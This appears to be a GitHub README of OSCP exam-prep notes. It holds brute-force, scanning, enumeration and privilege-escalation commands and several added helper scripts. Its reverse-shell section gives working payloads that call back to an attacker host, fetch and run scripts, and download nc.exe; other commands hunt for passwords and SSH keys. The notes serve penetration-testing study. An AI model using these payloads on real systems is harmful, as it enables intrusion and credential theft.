lRosenYTl/OSCP-Notes

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Useful Websites

Official exam guide
Official exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure your browser to proxy through Burp Suite
OWASP Juice Shop: OWASP security training application
Hack This Site
OverTheWire
pwnable.kr / pwnable.xyz
Hack The Box
Cybrary
Google Gruyere
Game of Hacks
bWAPP
WebGoat
hashcat: password recovery tool
feroxbuster: fast forced-browsing (directory brute-force) tool, an alternative to gobuster and dirb
AutoRecon: multi-threaded network reconnaissance tool that automates service enumeration
explainshell: explains each part of a command line
SecLists: a collection of many kinds of lists used during security assessments, gathered in one place
Reverse Shell Generator: online reverse shell generator
HackTricks
CyberChef: a web app for encryption, encoding, compression and data analysis
Microsoft Security Response Center

⚠️ Exam Restrictions

linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide

⚠️ Exam Change

2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
2023/3/15 PEN-200 (PWK): Updated for 2023

  • FAQ
  • The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam. After the new material has been available for six months, any content included in the new version of PWK will be eligible for inclusion on the exam.

🛠️ Commands

📂 hydra

Before brute-forcing, check manually that the service does not lock the account after a maximum number of failed login attempts; a lockout invalidates the attack and may leave the account unusable.

IMAP

hydra -L <usernameList> -P <passwordList> -s 143 -f <target ip> imap
# -L user list, -P password list (lowercase -l / -p take a single value instead)
# -f exit when a login/pass pair is found
# -s target port

PostgreSQL

hydra -l <username> -P <passwordList> <target ip> postgres

for normal connection

psql -U <username> -p 5432 -h <hostname or ip>

HTTP Basic Authentication

hydra -l admin -P <passwordList> -s 80 -f <target ip> http-get /
# the last argument is the path to request (/ by default); use the path that actually answers 401 with WWW-Authenticate

JSON

# A JSON login may only accept requests with the right Content-Type, Accept, Origin, X-Requested-With, Referer, CSRF token or cookies.
# Replay a real login with cURL first to find which headers are required, then pass each one with H=.
# hydra splits the module string on ':' (path:body:condition:H=...), so every literal colon in the JSON body, header values and URLs must be escaped as '\:'.
hydra -l admin -P <passwordList> <target ip> https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"
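Getting the colon escaping right by hand is the usual reason a JSON form attack "finds nothing" or errors out, so here is a small helper, added as an example and not part of the original notes, that builds the module string from the raw path, JSON body, condition and headers and escapes every literal colon for hydra. The host, path, wordlist and header values in the demo at the bottom are constructed placeholders; nothing is executed, the full hydra command line is only printed.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: build the module string for
# hydra's http-post-form / https-post-form against a JSON login endpoint.
# hydra splits that string on ':' (path:body:condition[:H=header...]), so
# every literal colon in the path, the JSON body, the condition and each
# header value has to be escaped as '\:'. Host, path and header values in
# the demo below are constructed placeholders.

# Escape every ':' so hydra reads it as data, not as a field separator.
hydra_escape() {
    printf '%s' "$1" | sed 's/:/\\:/g'
}

# hydra_json_form PATH BODY COND [HEADER...]
#   BODY keeps hydra's ^USER^ and ^PASS^ placeholders.
#   COND is the failure string (F=...) or success string (S=...).
hydra_json_form() {
    local path="$1" body="$2" cond="$3"
    shift 3
    local spec h
    spec="$(hydra_escape "$path"):$(hydra_escape "$body"):$(hydra_escape "$cond")"
    for h in "$@"; do
        spec="$spec:H=$(hydra_escape "$h")"
    done
    printf '%s' "$spec"
}

# Print the full hydra command line (nothing is executed here).
hydra_json_cmd() {
    local user="$1" wordlist="$2" host="$3" spec="$4"
    printf 'hydra -l %s -P %s -f %s https-post-form "%s"\n' \
        "$user" "$wordlist" "$host" "$spec"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    spec=$(hydra_json_form '/api/login' \
        '{"username":"^USER^","password":"^PASS^"}' 'F=401' \
        'Content-Type: application/json' 'Origin: https://test.com')
    hydra_json_cmd admin /usr/share/wordlists/rockyou.txt 192.0.2.10 "$spec"
fi
```

Run it once, paste the printed command into a terminal, and compare the request hydra sends (Burp or a `-d` debug run) with the cURL replay that worked; if the two differ in a header, add that header as another argument.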

📂 cewl

get a list for password crackers

cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers --lowercase
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
# --help

📂 nmap

Timing Templates

Host Discovery

scan a subnet

# Note that a timing template that is too fast (-T4/-T5) can drop probes and affect the results
nmap -T3 192.168.10.0/24

scan all TCP ports and services

nmap -Pn -p- -sC -sV -T4 <target ip>

optimizing performance

nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second

# and then specific port
nmap -p <target port> -sC -sV <target ip>

# UDP
nmap -p- --min-rate 1000 -sU <target ip>
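The fast full-port sweep followed by a targeted `-sC -sV` run is a two-step procedure, and the step people skip is pulling the open ports out of the first scan reliably. The script below is an added example (not from the original notes) that writes the first scan in greppable format, parses the open TCP ports from it and feeds them to the second scan. The `.gnmap` text in `sample_gnmap` is constructed so the parsing can be checked offline; `two_stage_scan` needs nmap and a reachable target.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: two-stage TCP scan.
# Stage 1: fast full-port sweep saved in greppable format (-oG).
# Stage 2: -sC -sV only against the ports stage 1 reported open.
# The .gnmap sample below is constructed to exercise the parser offline.

# open_ports_from_gnmap FILE: print open TCP ports as "22,80,8080".
# In -oG output each host has one "Ports:" line with entries like
# "80/open/tcp//http///" separated by ", ".
open_ports_from_gnmap() {
    grep -E '^Host: .*Ports: ' "$1" \
      | grep -oE '[0-9]+/open/tcp' \
      | cut -d/ -f1 | sort -un | paste -sd, -
}

# two_stage_scan TARGET [PREFIX]: run both stages (needs nmap).
two_stage_scan() {
    local target="$1" out="${2:-/tmp/stage1}" ports
    nmap -Pn -p- --min-rate 1000 -oG "$out.gnmap" "$target" >/dev/null
    ports="$(open_ports_from_gnmap "$out.gnmap")"
    if [ -z "$ports" ]; then
        echo "no open TCP ports found in $out.gnmap" >&2
        return 1
    fi
    echo "stage 2 on ports: $ports"
    nmap -Pn -p "$ports" -sC -sV -oN "$out.detail.nmap" "$target"
}

# sample_gnmap FILE: constructed stage-1 output (192.0.2.10 is a test address).
sample_gnmap() {
    cat > "$1" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- --min-rate 1000 -oG /tmp/stage1.gnmap 192.0.2.10
Host: 192.0.2.10 ()  Status: Up
Host: 192.0.2.10 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///, 8080/open/tcp//http-proxy///  Ignored State: filtered (65531)
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
EOF
}

if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -ge 1 ]; then
    two_stage_scan "$1"
fi
```

Usage: `bash scan.sh <target ip>`. Closed and filtered ports are deliberately ignored by the parser, so an empty result means stage 1 found nothing open, not that the parse failed; rerun stage 1 with a lower `--min-rate` before concluding the host is quiet.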

📂 reverse shell

ncat

ncat -e /bin/bash <attacker ip> <attacker port>
# -e exists in ncat and some nc builds (nc.traditional) but not in openbsd nc; use the mkfifo form under "special cases" when it is missing

python3(file)

#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>)) 
dup2(s.fileno(),0) 
dup2(s.fileno(),1) 
dup2(s.fileno(),2) 
run(["/bin/bash","-i"])

python(file)

#!/usr/bin/env python
import os
import sys
try:
    # spawn the shell in a child python so the calling process keeps running
    os.system("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'")
except Exception:
    print('ERROR...')
sys.exit(0)

When passing the one-liner directly as a command parameter in an exploit fails (usually quoting), write it to a script on the target first and run that

python

command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"

java

String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" }; 
Runtime.getRuntime().exec(cmdline);

php(file)

<?php system("nc -e /bin/bash <attacker ip> <attacker port>"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>

special case 1: nc without -e

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f

special case 2: fetch the shell script from the attacker's web server

# rev.sh, hosted on the attacker's web server, contains:
# sh -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1
# /dev/tcp is a bash feature, so run the script with bash as below, not with sh
curl http://<attacker ip>/rev.sh -o /tmp/rev.sh
bash /tmp/rev.sh

base64

echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash 
# example: the string below decodes to a python3 socket + pty shell back to 127.0.0.1:80
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash

Windows cmd

REM https://www.revshells.com/ Powershell#3(Base64)
PowerShell.exe -command "powershell -e <base64 command string>"

📂 Cron jobs

crontab -l
ls -alh /etc/cron.* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"

unprivileged Linux process snooping: pspy

📂 WordPress

WPScan

Fingerprinting the installation

wpscan --url http://192.168.0.1/

Enumerating valid usernames

wpscan --url http://192.168.0.1/ --enumerate u1-1000

Enumerating themes

wpscan --url http://192.168.0.1/ -e at
curl -k -s http://192.168.0.1/wp-content/themes/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2

Enumerating plugins

wpscan --url http://192.168.0.1/ -e ap
wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token: show vulnerability data for what is found (not always necessary); register a user on the official WPScan website to get an API key
curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
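The `sed ... THIIIIS ... awk` pipelines above work but are hard to read and break on `src="..."` with double quotes. The helper below is an added example (not from the original notes) that extracts theme and plugin slugs from any saved WordPress page with a single `grep -o`; the HTML in `sample_wp_html` is constructed, and the URL handled by `wp_components` is a placeholder.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: pull theme and plugin slugs
# out of a WordPress front page. Works on saved HTML (stdin) so it can be
# tested offline; the sample page below is constructed and 192.0.2.5 is a
# documentation address.

# wp_slugs KIND < html : print unique slugs under wp-content/KIND/.
# KIND is "themes" or "plugins". Quote style (' or ") does not matter
# because the match stops at the next '/' of the asset path.
wp_slugs() {
    grep -oE "wp-content/$1/[A-Za-z0-9._-]+" | cut -d/ -f3 | sort -u
}

# wp_components URL: fetch the page and list both kinds (needs curl).
wp_components() {
    local html
    html="$(curl -ks "$1")"
    echo "themes:";  printf '%s' "$html" | wp_slugs themes
    echo "plugins:"; printf '%s' "$html" | wp_slugs plugins
}

# sample_wp_html: constructed page with one theme and two plugins
# (one plugin referenced twice, to show de-duplication).
sample_wp_html() {
    cat <<'EOF'
<link rel='stylesheet' href='http://192.0.2.5/wp-content/themes/twentytwentythree/style.css?ver=1.0' />
<script src="http://192.0.2.5/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7"></script>
<script src="http://192.0.2.5/wp-content/plugins/contact-form-7/includes/swv/js/index.js"></script>
<link rel='stylesheet' href='http://192.0.2.5/wp-content/plugins/wp-file-upload/css/style.css' />
EOF
}

if [ "${BASH_SOURCE[0]}" = "$0" ] && [ $# -ge 1 ]; then
    wp_components "$1"
fi
```

Usage: `bash wp-slugs.sh http://192.168.0.1/`. Only components that load assets on the fetched page show up; plugins that are installed but add nothing to the front page need the directory-listing check or `wpscan -e ap --plugins-detection aggressive` above.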

Brute-force attack

wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin

If wpscan fails with "SSL peer certificate or SSH remote key was not OK" (self-signed certificate)

wpscan --url https://192.168.0.1/ --disable-tls-checks

📂 LFI

file in Windows

C:\Windows\System32\drivers\etc\hosts

📂 AutoRecon

git clone https://github.com/Tib3rius/AutoRecon.git

cd AutoRecon

sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results

📂 Wfuzz

find subdomains

wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# --hw <n>: hide responses with n words; 407 is the word count of the default vhost response, found by a first run without the filter

need to authenticate

# php example: reuse a valid session cookie so fuzzed requests are authenticated
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>

post requests

wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d: POST data (turns the request into a POST)
# -z file,<wordlist>: payload source
# --hc <code>: hide responses with this HTTP status code

📂 hashcat

create new password list

echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline

hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt

MD5

REM MD5 is hash mode 0 (-m 0); -a 0 is a straight dictionary attack
.\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt

🖥️ Linux

Typical site folders

/srv/http/
/var/www/html/

avoid "permission denied" messages

find / -name '*kali*' 2>&-
# quote the pattern so the shell does not expand it before find sees it; 2>&- closes stderr (2>/dev/null does the same)

Writable file

find / -writable -type f 2>/dev/null | grep -v "/proc/"

find files containing specific text

find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-

finding SUID executables (equivalent forms; -perm -4000 and -perm -u=s are the same test)

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
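The SUID listing from `find` is long on any real box, and the useful entries are the ones a stock install would not have. The script below is an added example (not from the original notes) that runs the same `find -perm -4000` and then prints only the binaries whose name is not in a small baseline of common SUID programs. The baseline is an assumption (a handful of names that commonly carry the bit on stock Linux installs), not an authoritative list, and the test tree is constructed; setting the SUID bit on your own files needs no root, which is what makes the offline check possible.

```shell
#!/usr/bin/env bash
# Added example, not from the original notes: list SUID binaries and flag
# the ones not in a baseline of common distro binaries. The baseline is an
# assumption (common names on stock installs), not an authoritative list.

# Names that commonly carry the SUID bit on stock Linux installs (assumed).
suid_baseline='passwd su sudo mount umount chsh chfn newgrp gpasswd ping fusermount pkexec'

# find_suid ROOT: every SUID regular file under ROOT, one per line, sorted.
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# unusual_suid ROOT: SUID files whose basename is not in the baseline.
unusual_suid() {
    local f
    find_suid "$1" | while IFS= read -r f; do
        case " $suid_baseline " in
            *" $(basename "$f") "*) ;;          # known name, skip
            *) printf '%s\n' "$f" ;;             # custom binary, inspect
        esac
    done
}

# make_sample_tree ROOT: constructed tree with one baseline SUID file, one
# custom SUID file and one normal file (chmod 4755 on own files needs no root).
make_sample_tree() {
    local root="$1"
    mkdir -p "$root/usr/bin" "$root/opt/app"
    : > "$root/usr/bin/passwd";  chmod 4755 "$root/usr/bin/passwd"
    : > "$root/opt/app/backup";  chmod 4755 "$root/opt/app/backup"
    : > "$root/usr/bin/ls";      chmod 0755 "$root/usr/bin/ls"
}

if [ "${BASH_SOURCE[0]}" = "$0" ]; then
    unusual_suid "${1:-/}"
fi
```

Usage on a target: `bash suid.sh` (defaults to `/`). A custom SUID binary printed here is the first thing to look at with `strings`/`ltrace`, but do not ignore the baseline names entirely: an old `pkexec` or `sudo` is still worth a version check.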

find ssh key

find / -type f -name 'id_rsa*' 2>&-

what the group can do

id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null

upgrade a reverse shell to an interactive TTY

# 0. on Kali: start the listener from bash
bash
nc -nlvp <local port>
# 1. on the target: spawn a PTY
/usr/bin/script -qc /bin/bash /dev/null
# or
script -c "/bin/bash -i" /dev/null
# chsh - change your login shell permanently (-s sets the shell; asks for the user's password)
chsh -s /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# finding the current shell (two ways)
echo $0
/proc/self/exe --version

🖥️ Windows

icacls: show (or change) the ACLs of files and directories

icacls <directory> /t
# /t: performs the operation on all specified files in the current directory and its subdirectories

Remarks

A sequence of simple rights:

F - Full access
M - Modify access
RX - Read and execute access
R - Read-only access
W - Write-only access

download file

certutil -urlcache -split -f <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"

get file hash

certutil -hashfile <file> MD5

find files containing specific text

findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf

📂 PowerShell

bypass

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1

zip

Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist.zip

unzip

Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop

reverse shell

powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"

find specific files

Get-ChildItem -Path "C:\Folder" -Recurse -Force -Filter "*.txt"
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Include "*.txt","*.zip","*.conf"

📂 Firefox

disable searching from the address bar so typed hostnames and paths are requested as-is, which makes testing easier

type "about:config" in the address bar
Accept the warning
Search "keyword.enabled" and set it to false

modify header tool (or Burp Suite)

https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/

📂 others (Windows paths)

C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts
